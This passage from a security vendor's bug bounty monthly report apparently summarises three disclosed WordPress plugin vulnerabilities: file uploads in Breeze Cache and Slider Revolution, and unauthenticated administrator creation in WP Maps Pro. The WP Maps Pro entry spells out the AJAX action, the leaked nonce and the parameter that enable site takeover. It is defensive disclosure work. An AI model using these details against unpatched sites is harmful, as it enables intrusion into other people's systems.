<div><a href="https://www.wordfence.com/blog/2026/05/attackers-actively-exploiting-critical-vulnerability-in-breeze-cache-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/05/FeaturedImage_Wordfence_324.01.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>Breeze Cache &lt;= 2.4.4 – Unauthenticated Arbitrary File Upload via fetch_gravatar_from_remote</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener"> bashu</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$2,691.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ‘fetch_gravatar_from_remote’ function in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. The vulnerability can only be exploited if “Host Files Locally – Gravatars” is enabled, which is disabled by default.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/attackers-actively-exploiting-critical-vulnerability-in-breeze-cache-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> Authenticated Arbitrary File Upload Vulnerability Patched in Slider Revolution 7 WordPress Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/authenticated-arbitrary-file-upload-vulnerability-patched-in-slider-revolution-7-wordpress-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/05/FeaturedImage_Wordfence_323.03.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>Slider Revolution 7.0.0 – 7.0.10 – Authenticated (Subscriber+) Arbitrary File Upload via _get_media_url</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"> h0xilo</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$4,914.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The Slider Revolution plugin for WordPress is vulnerable to Arbitrary File Upload in versions 7.0.0 to 7.0.10 via the ‘_get_media_url’ and ‘_check_file_path’ function. This is due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload files that may be executable, which makes remote code execution possible. The vulnerability was partially patched in version 7.0.10 and fully patched in version 7.0.11.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/authenticated-arbitrary-file-upload-vulnerability-patched-in-slider-revolution-7-wordpress-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<div>
<div>
<h3><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f6a8.png" alt="&#x1f6a8;" class="wp-smiley"> 15,000 WordPress Sites Affected by Administrator Account Creation Vulnerability in WP Maps Pro WordPress Plugin</h3>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/15000-wordpress-sites-affected-by-administrator-account-creation-vulnerability-in-wp-maps-pro-wordpress-plugin/" target="_blank" rel="noopener"><br />
<img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/05/FeaturedImage_Wordfence_224.04.png" alt="Vulnerability blog post thumbnail"><br />
</a></div>
<div>
<h4>WP Maps Pro &lt;= 6.1.0 – Unauthenticated Privilege Escalation via Administrator Account Creation to wpgmp_temp_access_ajax AJAX Action</h4>
<div>
<div><strong>Submitted by:</strong><br />
<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/david-brown" target="_blank" rel="noopener">David Brown</a></div>
<div><strong>Bounty Awarded:</strong><br />
<span>$1,950.00</span></div>
</div>
<div>
<div><strong>Technical Details:</strong></div>
<p>The WP Maps Pro plugin for WordPress is vulnerable to Privilege Escalation via Administrator Account Creation in all versions up to, and including, 6.1.0. This is due to the wpgmp_temp_access_ajax AJAX action being registered with wp_ajax_nopriv_ and protected only by a nonce check using the fc-call-nonce nonce, which is publicly embedded into every frontend page via wp_localize_script as the nonce field of the wpgmp_local JavaScript object, rendering the check ineffective as an access control mechanism. This makes it possible for unauthenticated attackers to invoke the wpgmp_temp_access_support handler with check_temp=false, which unconditionally creates a new WordPress user with the hardcoded role of administrator via wp_insert_user() and returns a magic login URL that, when visited, calls wp_set_auth_cookie() to fully authenticate the attacker as the newly created administrator, resulting in complete site takeover.</p>
</div>
<div><a href="https://www.wordfence.com/blog/2026/05/15000-wordpress-sites-affected-by-administrator-account-creation-vulnerability-in-wp-maps-pro-wordpress-plugin/" target="_blank" rel="noopener"><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4d6.png" alt="&#x1f4d6;" class="wp-smiley"> Read the complete vulnerability analysis</a></div>
</div>
</div>
<p> </p>
<hr>
<h2><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4dd.png" alt="&#x1f4dd;" class="wp-smiley"> Conclusion</h2>
<p>WordPress thrives when researchers, vendors, hosts, and site owners pull in the same direction. By funding high-quality research, coordinating responsible disclosure, and shipping firewall rules at scale, Wordfence turns findings into protection for millions of sites.</p>
<p>If you’re a researcher, <a href="https://www.wordfence.com/threat-intel/researcher-register" target="_blank" rel="noopener">join the program</a> and submit your next report. If you’re a site owner, update early and often, and run <a href="https://www.wordfence.com/products/pricing/" target="_blank" rel="noopener">Wordfence</a> to stay ahead of emerging threats. If you’re a vendor, sign up for the <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">vulnerability management portal</a> to receive real-time notifications when new vulnerabilities are reported in your software. Together, we make the WordPress ecosystem safer.</p>
</div>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/wordfence-bug-bounty-program-monthly-report-may-2026/" target="_blank" rel="noopener">Wordfence Bug Bounty Program Monthly Report – May 2026</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
